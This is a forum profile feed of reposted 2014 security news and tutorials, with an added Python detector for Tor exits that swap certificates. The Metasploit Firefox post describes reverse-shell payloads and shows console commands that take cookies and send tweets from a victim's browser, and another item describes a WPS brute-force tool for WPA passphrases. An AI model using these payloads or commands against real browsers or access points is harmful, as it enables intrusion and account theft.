Everything posted by Nytro
-
Near error-free wireless detection made possible

Date: January 23, 2014
Source: University of Cambridge

Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems.

A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems.

The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts.

The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation.

RFID is a widely-used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once. Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them.

"Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment."

Several other methods of improving passive RFID coverage have been developed, but they do not address the issue of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able to achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero per cent over a 20 by 15 metre area.

In addition, the new system requires fewer antennas than current technologies. In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas.

The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing.

Source: Near error-free wireless detection made possible -- ScienceDaily
-
Getting Started with WinDBG - Part 1

By Brad Antoniewicz.

WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it is still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running. This is part one of a multipart series; here's our outline of what's in store:

Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
Part 2 - Breakpoints
Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory.

Installation

Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both.

Windows 8

For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK). You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The latter will be the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future. From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then Next through that install. Then you're all ready to go!

Windows 7 and Below

For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer, which makes future debugging efforts a heck of a lot easier. That's what I'll do here. Once the installation completes, you should have the redistributables for the various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple: just copy the appropriate redistributable to the system you're debugging and then click through the installation.

Full article: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html
-
Who is spying on Tor network exit nodes from Russia?

by paganinip on January 23rd, 2014

Researchers Winter and Lindskog identified 25 nodes of the Tor network that tampered with web traffic, decrypted the traffic, or censored websites.

Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior; it has been discovered that an unspecified Russian entity is eavesdropping on nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and they discovered that the entity appeared to be particularly interested in users' Facebook traffic.

Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. Of the overall nodes compromised, 19 were tampered with using man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly.

The Tor network anonymizes the user's web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 "exit nodes." The study proposed is based on two fundamental considerations:

- The user's traffic is vulnerable at the exit nodes. For bad actors, the transit of the traffic through an exit node exposes it to eavesdropping. Very popular was the case of WikiLeaks, which was initially launched with documents intercepted from Tor network eavesdropping on Chinese hackers through a bugged exit node.
- Tor nodes are run by volunteers that can easily set up and take down their servers every time they need and want.

The attackers in these cases adopted a bogus digital certificate to access traffic content; for the remaining 6 cases it has been observed that the impairment resulted from configuration mistakes or ISP issues.

The study revealed that the nodes used to tamper with the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passively eavesdropped on unencrypted web traffic on the exit nodes; by checking the digital certificates used over Tor connections against the certificates used in direct "clear-web sessions", they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers controlling the Russian nodes access the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity "Main Authority."

It appears to be a well-organized operation; the researchers noted that after blacklisting the "Main Authority" Tor nodes, new ones using the same certificate would be set up by the same entity. It is not clear who is behind the attack; Winter and Lindskog believe that the spying operation was conducted by isolated individuals instead of a government agency because the technique adopted is too noisy: the attackers used a self-signed certificate that causes browser warnings for Tor users. "It was actually done pretty stupidly," says Winter.

It must also be considered that intelligence agencies, including the NSA, are spending a great effort to infiltrate the Tor network; one of the documents leaked by Edward Snowden on US surveillance expressly refers to a project, codenamed Tor Stinks, to track profiles in the deep web. Despite the high interest in Tor networks and their potentialities, the network is considered the best way to protect the user's anonymity online, and governments don't want this.

Pierluigi Paganini (Security Affairs – Tor network, Russia)

Source: Who is spying on Tor network exit nodes from Russia?
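Added example, not part of the post or of the researchers' tool: the certificate-comparison check the article describes, run over constructed observations. Relay fingerprints, site names and certificate hashes below are made-up placeholders; the logic flags an exit as MITM only when it presents a certificate unseen in the direct (clear-web) baseline that is also self-signed, and clusters exits that reuse the same forged certificate so that a replacement relay is caught immediately.

```python
"""Spotting certificate-swapping Tor exits by comparing the leaf certificate
seen through each exit with the certificates seen in direct sessions.

Constructed example data (not from the Winter/Lindskog study):
- BASELINE maps a site to the SHA-256 fingerprints seen in direct sessions.
- OBSERVATIONS are per-exit, per-site records of the certificate presented.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class CertObservation:
    exit_fp: str       # Tor relay fingerprint (placeholder value)
    site: str          # site contacted through the exit
    cert_sha256: str   # SHA-256 of the DER leaf certificate (placeholder)
    issuer: str        # issuer distinguished name
    subject: str       # subject distinguished name

    @property
    def self_signed(self) -> bool:
        # A leaf whose issuer equals its subject is self-signed, which is the
        # "Main Authority" pattern described in the article.
        return self.issuer == self.subject


# Direct (non-Tor) sessions: what the sites really serve. Rotating CDN keys
# are modelled by giving example.org two legitimate fingerprints.
BASELINE = {
    "facebook.com": {"sha256:FB-REAL"},
    "example.org": {"sha256:EX-REAL-A", "sha256:EX-REAL-B"},
}

# Constructed observations. Two exits swap only the Facebook certificate
# (selective interception), one is clean, one shows an unknown but CA-issued
# certificate that deserves a manual look rather than an automatic verdict.
OBSERVATIONS = [
    CertObservation("EXIT-RU-01", "facebook.com", "sha256:MA-001",
                    "CN=Main Authority", "CN=Main Authority"),
    CertObservation("EXIT-RU-01", "example.org", "sha256:EX-REAL-A",
                    "CN=Real CA", "CN=example.org"),
    CertObservation("EXIT-RU-02", "facebook.com", "sha256:MA-001",
                    "CN=Main Authority", "CN=Main Authority"),
    CertObservation("EXIT-DE-01", "facebook.com", "sha256:FB-REAL",
                    "CN=Real CA", "CN=facebook.com"),
    CertObservation("EXIT-DE-01", "example.org", "sha256:EX-REAL-B",
                    "CN=Real CA", "CN=example.org"),
    CertObservation("EXIT-NL-01", "example.org", "sha256:EX-NEW",
                    "CN=Real CA", "CN=example.org"),
]


def classify(obs: CertObservation, baseline: dict) -> str:
    """Verdict for one observation: 'ok', 'mitm' or 'review'."""
    if obs.cert_sha256 in baseline.get(obs.site, set()):
        return "ok"          # identical to what a direct session sees
    if obs.self_signed:
        return "mitm"        # unknown AND self-signed: re-encryption by the exit
    return "review"          # unknown but CA-issued: possible key rotation


def scan(observations, baseline: dict) -> dict:
    """Worst verdict per exit, so a single swapped site is enough to flag it."""
    rank = {"ok": 0, "review": 1, "mitm": 2}
    worst = {}
    for obs in observations:
        verdict = classify(obs, baseline)
        if rank[verdict] > rank.get(worst.get(obs.exit_fp), -1):
            worst[obs.exit_fp] = verdict
    return worst


def cert_clusters(observations) -> dict:
    """Group exits by the self-signed certificate they present.

    A newly appearing relay that reuses an already-seen forged certificate
    lands in an existing cluster, which is how a blacklisted operator that
    simply spins up new exits with the same certificate is recognised."""
    clusters = defaultdict(set)
    for obs in observations:
        if obs.self_signed:
            clusters[obs.cert_sha256].add(obs.exit_fp)
    return {cert: sorted(exits) for cert, exits in clusters.items()}


def bad_exits(observations, baseline: dict) -> list:
    """Sorted list of exits that earned a 'mitm' verdict."""
    return sorted(e for e, v in scan(observations, baseline).items()
                  if v == "mitm")


if __name__ == "__main__":
    for exit_fp, verdict in sorted(scan(OBSERVATIONS, BASELINE).items()):
        print(f"{exit_fp}: {verdict}")
    print("forged-certificate clusters:", cert_clusters(OBSERVATIONS))
```

The "review" verdict matters in practice: a legitimate site that rotates keys between the Tor and direct measurements would otherwise be misreported as a hostile exit.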
-
Retrieve WPA/WPA2 passphrase from a WPS enabled access point.

OVERVIEW

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture. Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.

Source: https://github.com/bdpurcell/bully
-
PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB

January 25th, 2014, 14:45 GMT · By Silviu Stahie

PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1.

PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more.

According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking has been added. Also, support for large (>2GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available.

You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia.

Source: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB
-
Spotting the Adversary with Windows Event Log Monitoring

Author: National Security Agency/Central Security Service

Contents

1 Introduction
2 Deployment
2.1 Ensuring Integrity of Event Logs
2.2 Environment Requirements
2.3 Log Aggregation on Windows Server 2008 R2
2.4 Configuring Source Computer Policies
2.5 Disabling Windows Remote Shell
2.6 Firewall Modification
2.7 Restricting WinRM Access
2.8 Disabling WinRM and Windows Collector Service
3 Hardening Event Collection
3.1 WinRM Authentication Hardening Methods
3.2 Secure Sockets Layer and WinRM
4 Recommended Events to Collect
4.1 Application Whitelisting
4.2 Application Crashes
4.3 System or Service Failures
4.4 Windows Update Errors
4.5 Windows Firewall
4.6 Clearing Event Logs
4.7 Software and Service Installation
4.8 Account Usage
4.9 Kernel Driver Signing
4.10 Group Policy Errors
4.11 Windows Defender Activities
4.12 Mobile Device Activities
4.13 External Media Detection
4.14 Printing Services
4.15 Pass the Hash Detection
4.16 Remote Desktop Logon Detection
5 Event Log Retention
6 Final Recommendations
7 Appendix
7.1 Subscriptions
7.2 Event ID Definitions
7.3 Windows Remote Management Versions
7.4 WinRM 2.0 Configuration Settings
7.5 WinRM Registry Keys and Values
7.6 Troubleshooting
8 Works Cited

Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf
-
Improving the Human Firewall

Introduction

Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide – it is pointless to expend millions of dollars on the most recent software and hardware to defend the corporate networks against all kinds of internal and external threats only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: "A chain is only as strong as its weakest link" and it is tightly related to information security, as attackers test all possible points of access for vulnerabilities and usually choose the least resistant one.

A report from Wisegate, a peer-based IT knowledge service, states that the threat from inner computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claim that user security awareness was a top concern in 2013.

Most companies already do training and have a relatively high expenditure on computer-based training programs. These trainings just do not prove as efficient as they are planned to be. The key issue here is to differentiate between training and education – training employees involves actions while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results to the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that it permits them to act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program. This cannot be achieved merely by conducting training, leaving notes and hanging up posters.

Isn't the average Internet user already aware of the security issues that he might be confronted with?

To illustrate our point, we looked at the trends in Google search for the following keywords: The following results were shown:

The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the term social engineering for most periods due to its low demand. We see from the red and purple curves above that between 2004 and 2007 many Internet users demanded keygens and torrents to get illegal access to paid software (at a generally declining rate) but their awareness of possible implications of keygens such as malware and social engineering remained relatively stagnant. From 2008 up to now we see a slight increase in the search tendency for malware and phishing while the query tendency for keygen and torrents has been falling at an increasing rate, and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet. Nonetheless, this decline of piracy and risky behavior is also due to other reasons such as better enforcement of copyright laws, removal of access to websites with illegal contents by ISPs, closure of online businesses operating in the grey market by governments, inter alia.

However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as demanded a keyword as virus and more demanded than keygen, torrents, social engineering, phishing, malware. It appears that the end-users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords virus and anti-virus are more trending than torrents and multiple times more popular than social engineering, phishing and malware, which pinpoints the low safety precautions of the average Internet user, as responsibilities for Web safety appear to end with installing anti-virus software and ignoring the safe use of the Internet. Related queries for "virus" appear to be "anti virus", "virus download", "antivirus", "virus scan", "free anti virus", "avg", "avg virus", "virus removal", "virus protection", among others, which show the overall direction of the users' input in terms of the keyword "virus".

We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever, pinpointing the need for ameliorating the current security awareness programs that companies undertake.

If I have to educate and not train, what should I change?

Firstly, you should start by organizing group lunches with a security-oriented purpose. Each employee would appreciate a good lunch and/or dessert so the attendance of such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures but by resorting to overall participation and group-wide discussion instead. In these lunches, you can begin to sort out regular attendees who have the potential to become champions within the different work groups and who can later on help educate the other employees in their group.

Secondly, you can try to bring in outside security professionals as they are usually eager to get CPE (continuing professional education) credits, even more so if you add some goodwill gesture. The local security pros may present security issues or discuss security with your employees.

Thirdly, you should provide your employees information on maintaining Internet safety at home. Such discussions are always well-attended, even more so if you show them something relevant to them such as how to keep kids safe at home. The information must really affect them personally and they must find it relevant to make them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics would be well-accepted.

Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office; more informal settings are also beneficial. The point here is that it is important to show them that you are pondering over their problems and attempting to remedy them; in this way they can understand and help with your concerns as well.

Fifthly, the old way of hanging posters on the wall and dispersing newsletters can also be efficient. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter would be beneficial if it is interesting and relevant. Tips are usually not interesting and relevant as they are self-serving, unless they provide some advice on safety at home, which automatically makes them relevant.

Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing.

Seventhly, create a security mentoring/tutoring option. It is possible that nobody signs up for it, but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions and would help in pinpointing gifted employees as regards security awareness and would help shape a champion among your employees who would educate the others during the course of work.

Eighthly, you should offer your employees ride-alongs whereby you give them the opportunity to take a look at how the IT or security program actually looks from the inside. The opposite should be done as well – making IT and security staff take a glimpse of how a day in the workplace of the employees looks may also be useful.

Finally, you should strive to create an environment of teamwork as it is proven that good teamwork has several positive features that come with it, such as:

- Better problem solving capabilities
- Quicker completion of tasks
- Competition which leads personnel to excel at what they do
- Bringing a combination of different unique qualities to the table may lead to better efficiency in the employees' decision-making

(References as regards these four features can be found at the bottom of the article.)

As Henry Ford once said: "Coming together is a beginning. Keeping together is progress. Working together is success."

Testing the human firewall

Testing the human firewall is easy, so you can effortlessly track the company's progress. The first and most employed way to test the human firewall is through written tests which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to fake a phishing campaign against your company, do the attack yourself or hire external security professionals to raise the bar even higher.

Below are 3 sample questions that may be used in multiple-choice tests and 3 open questions that require a written answer. Similar questions can be used when testing your personnel's security awareness.

What are some important tips when it comes to improving the human firewall?

- Simple labels that classify data as protected and unprotected such as "confidential" and "public" are a great place to start.
- Prohibiting password reuse and teaching the human firewall good password habits is crucial.
- The security staff has to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will aid the security staff in assessing the efficiency of their security programs, on the other hand.
- When reporting the results from security awareness tests, it is preferable to share them either anonymously or statistically. Though, if negative trends arise from particular employees or groups of employees, share those results with the proper persons and attempt to solve those issues without putting any blame on the people who fall behind with their security education.
- Teach employees not to store any company data on their smartphone.
- Teach personnel not to connect USB drives, external hard disks or any writeable media to the workplace computer.
- To reduce social engineering attacks against your employees, limit the information that can be gathered about your employees during the reconnaissance stage of the attack (this involves educating them not to divulge too much information about themselves in the public domain).
- Remove any organization charts which reveal the employees' names, job positions and photos from the company's public website.
- Teach the personnel to handle external contacts properly through systematic training.
- Teach the personnel not to respond to accusations instantaneously but to turn to colleagues, legal staff, etc. before handling complaints.
- Teach personnel to limit the information they provide in social networks and other public domain sources such as Facebook.

Conclusion

It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide. Their success varies depending on factors such as the preliminary awareness of the factors, the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall involve modifying strategies that are already taking place in the companies, such as transforming the type of information delivered to employees in a way that makes it relevant to the employees and that makes it affect them personally, or transforming posters and newsletters in a way that excludes any tips and includes anecdotes and metaphors which will encourage the employees to read this advice and ease them in remembering the rules, whereas some involve a totally new strategy for some companies – like performing ride-alongs so the IT staff can better understand the other employees and vice versa. We have also seen that testing the results from such security awareness education does not take a lot of effort, but it is highly valuable as it can reveal the weak spots or the weakest links of your human firewall. Finally, we have provided some advice that resolves relatively recent issues that have emerged as regards the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is one possible solution to the BYOD problem that has emerged only recently.

References:

- Richard O'Hanley, James S. Tiller and others, 'Information Security Management Handbook, 6th edition, Volume 7'
- Munir Kotadia, "'Human firewall' a crucial defence: Mitnick", Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet
- Laneye, 'Managers under attack', Available at: Social Engineering - Managers under attack
- Business Wire, 'New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013', Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire
- University of California, MERCED, 'Security Self-Test: Questions and Scenarios', Available at: Security Self-Test: Questions and Scenarios | Information Technology
- Ken Hess, 'The second most important BYOD security defense: user awareness', Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet
- LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). "A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria". Personnel Psychology 61 (2): 273–307.
- Hoegl, Martin, and Hans Georg Gemuenden (2001). "Teamwork Quality and the Success of Innovative Projects: a Theoretical Concept and Empirical Evidence". Organization Science 12 (4): 435–449.

By Ivan Dimov | January 24th, 2014

Source: Improving the Human Firewall - InfoSec Institute
-
New Metasploit Payloads for Firefox Javascript Exploits
Nytro posted a topic in Tutorials in English
New Metasploit Payloads for Firefox Javascript Exploits

Posted by joev in Metasploit on Jan 23, 2014 3:57:54 PM

Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads:

- firefox/shell_reverse_tcp
- firefox/shell_bind_tcp
- firefox/exec

These are Javascript payloads meant for executing in a privileged Javascript context inside of Firefox. By calling certain native functions not meant to be exposed to ordinary web content, a classic TCP command shell can be opened. To a pentester, these payloads are useful for popping platform-independent in-process shells on a remote Firefox instance.

How does it work?

Firefox contains a Javascript API called XPCOM which consists of privileged native methods primarily implemented as C++ bindings. This API is commonly invoked by Firefox Addons and is also used by the "glue" code running inside the Firefox browser itself. If you can find a way to run Javascript code with access to XPCOM - either by convincing the user to install an untrusted addon or by finding a privilege escalation exploit in Firefox itself - you can open a raw TCP socket and run executables with Javascript. By using some shell redirection, we can get a working command shell connection back to a metasploit instance.

We currently have three Firefox privilege escalation exploits in the framework:

- exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash)
- exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*)
- exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions)

Why is it better?

The Javascript payloads are able to maintain shell sessions without dropping a native exe to the disk, which makes their presence significantly harder to detect. Another immediate benefit is that our existing Firefox exploits can now be included in BrowserAutopwn, since the target is static.
Additionally, since the payload still has access to the Firefox Javascript environment, we can just as easily eval Javascript code, which makes things like cookie extraction or XSS attacks very easy. As an example I wrote a post module, post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed:

    msf> use post/firefox/gather/xss
    msf> set SESSION 1
    msf> set URL https://rapid7.com
    msf> set SCRIPT "send(document.cookie);"
    [+] id=f612814001be908ds79f

Or, with a slightly more advanced script which sends a tweet in the target browser:

    msf> set URL https://twitter.com
    msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';"
    [+] sent

Note: You can use return or send to send back data, but you can only send once.

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

Source: https://community.rapid7.com/community/metasploit/blog/2014/01/23/firefox-privileged-payloads
-
Tech Insight: Defending Point-of-Sale Systems

John H. Sawyer

US-CERT publishes advice on defending POS systems against attacks like those against Target, Neiman Marcus.

Major hacks at retailers that include Target and Neiman Marcus have put a new spotlight on the security of point of sale (POS) systems. What may come as a surprise to some is that the memory-scraping malware attacks were nothing new. Last year, Visa published two "Visa Data Security Alerts" warning merchants of an increase in attacks targeting credit card data, with specific references to memory-scraping malware.

The alerts were published in April and August. The first stated that Visa had seen an increase in network intrusions involving grocery merchants since January 2013. August's update used nearly the same verbiage but mentioned retail instead of grocery. The part that's of particular interest is how the attackers were carrying out the attacks. "Once inside the merchant's network, the hacker will install memory parser malware on the Windows based cash register system in each lane or on Back-of-the-House (BOH) servers to extract full magnetic stripe data in random access memory (RAM)."

With two notices earlier in the year, retailers breached in the 4th quarter had early notification that attacks specifically targeting POS systems had been seen increasing. The alerts from Visa even included details on how to protect POS and related PCI systems from the types of attacks being carried out. So how is it that companies who were considered PCI compliant had their POS devices and PCI environment compromised?

From a penetration tester's perspective, it is all too common to find that merchants considered compliant are not necessarily secure. As an industry, we've been saying for years that compliance does not equal security, and these big data breaches are classic examples. It is easy to fill out a form stating that certain controls are in place, but the harsh reality is that those controls are rarely tested thoroughly to ensure their effectiveness at protecting cardholder data.

US-CERT, part of the Department of Homeland Security, issued Alert TA14-002A on January 2, 2014 titled "Malware Targeting Point of Sale Systems." The document discusses hardware and software attacks against POS systems and includes specific recommendations on protecting them. Unlike the Visa Alerts, US-CERT has put together guidance that focuses specifically on security best practices without mentioning specialized hardware and software (i.e. EMV-enabled PIN-entry, SRED-enabled devices, PA-DSS compliant payment applications). Alert TA14-002A targets 6 areas that POS administrators should follow:

Use Strong Passwords: During the installation of POS systems, installers often use the default passwords for simplicity on initial setup. Unfortunately, the default passwords can be easily obtained online by cybercriminals. It is highly recommended that business owners change passwords to their POS systems on a regular basis, using unique account names and complex passwords.

Default passwords are the low-hanging fruit that penetration testers tend to go for first. It's amazing how often network devices and application servers are set up on a network with default passwords in place. Whether it's an administration interface for Apache Tomcat or something like HSRP for Cisco routers, it's difficult to find a network that doesn't have at least one system with a default password. A vulnerability scanner like Nessus or NeXpose can help with finding these default passwords, but manual verification should be done also, as vulnerability scanners don't have the default passwords for every device.

Update POS Software Applications: Ensure that POS software applications are using the latest updated software applications and software application patches. POS systems, in the same way as computers, are vulnerable to malware attacks when required updates are not downloaded and installed on a timely basis.

Keeping POS applications updated should be part of the patch management strategy for every merchant. The common hurdle is that new versions generally cost money, which causes companies to avoid upgrades until technical problems arise. While the risks to POS software can sometimes be mitigated through other security controls like host intrusion prevention software (HIPS) and firewalls, it's important that merchants remember that new versions also bring security and bug fixes that can help keep cardholder data safe -- they'll need to bite the bullet eventually and upgrade.

Install a Firewall: Firewalls should be utilized to protect POS systems from outside attacks. A firewall can prevent unauthorized access to, or from, a private network by screening out traffic from hackers, viruses, worms, or other types of malware specifically designed to compromise a POS system.

A key tenet of the PCI DSS is network segmentation, and firewalls are essential. Host- and network-based firewalls should be utilized as part of a layered security approach. Traffic should only be allowed to and from the POS to systems that are similarly hardened against attack. Where possible, the traffic should also be monitored by an intrusion detection/prevention system to detect and/or prevent attacks.

Use Antivirus: Antivirus programs work to recognize software that fits their current definition of being malicious and attempt to restrict that malware's access to the systems. It is important to continually update the antivirus programs for them to be effective on a POS network.

US-CERT is on target with its advice to use updated antivirus, but anti-malware protections should not stop there. Merchants should consider implementing a full endpoint protection suite that includes antivirus, HIPS, firewall, traffic inspection, and application whitelisting. While these solutions are not foolproof, they raise the bar for exploitation considerably.

Restrict Access to Internet: Restrict access to POS system computers or terminals to prevent users from accidentally exposing the POS system to security threats existing on the Internet. POS systems should only be utilized online to conduct POS-related activities and not for general Internet use.

Unless the POS application specifically needs Internet access, it should be completely firewalled off from the Internet. In the situation that the POS software does need to communicate with systems on the Internet, firewalls should be used to strictly block all traffic except that to authorized systems. Application proxies should be used to proxy and inspect traffic to and from the Internet.

Disallow Remote Access: Remote access allows a user to log into a system as an authorized user without being physically present. Cybercriminals can exploit remote access configurations on POS systems to gain access to these networks. To prevent unauthorized access, it is important to disallow remote access to the POS network at all times.

This is the only area of advice from US-CERT that might be considered overkill, as it's going to make authorized remote management impossible. With proper firewall configurations restricting access only to authorized management workstations and multi-factor authentication, remote access is perfectly acceptable. Of course, this is where companies get in trouble, as they aren't always diligent in ensuring firewall configurations are correct and the machines accessing them are secured.

POS systems are not difficult to secure if merchants would simply follow the advice that has been put out by Visa and US-CERT. Most of the advice is based on security best practices that have been around for years. Unfortunately, it often takes a data breach for companies to have their eyes opened to the impact their negligence can have on their customers and their brand. Will Target, Neiman Marcus, and other retailers' recent troubles be the impetus companies need to secure their systems, or will they have to experience it firsthand?

Source: Tech Insight: Defending Point-of-Sale Systems -- Dark Reading
-
Discovered first Win trojan to serve banking Android malware on mobile

by paganinip on January 25th, 2014

Symantec experts recently came across a Windows malicious code that attempts to infect connected Android devices, serving them an Android malware.

Researchers at the Symantec antivirus firm have discovered a malicious code that is able to infect an Android mobile device with a banking malware during synchronization. The Android malware, delivered by a threat designed to hit Windows users, can compromise the user’s smartphone during file transfer, device syncing and backup management operations.

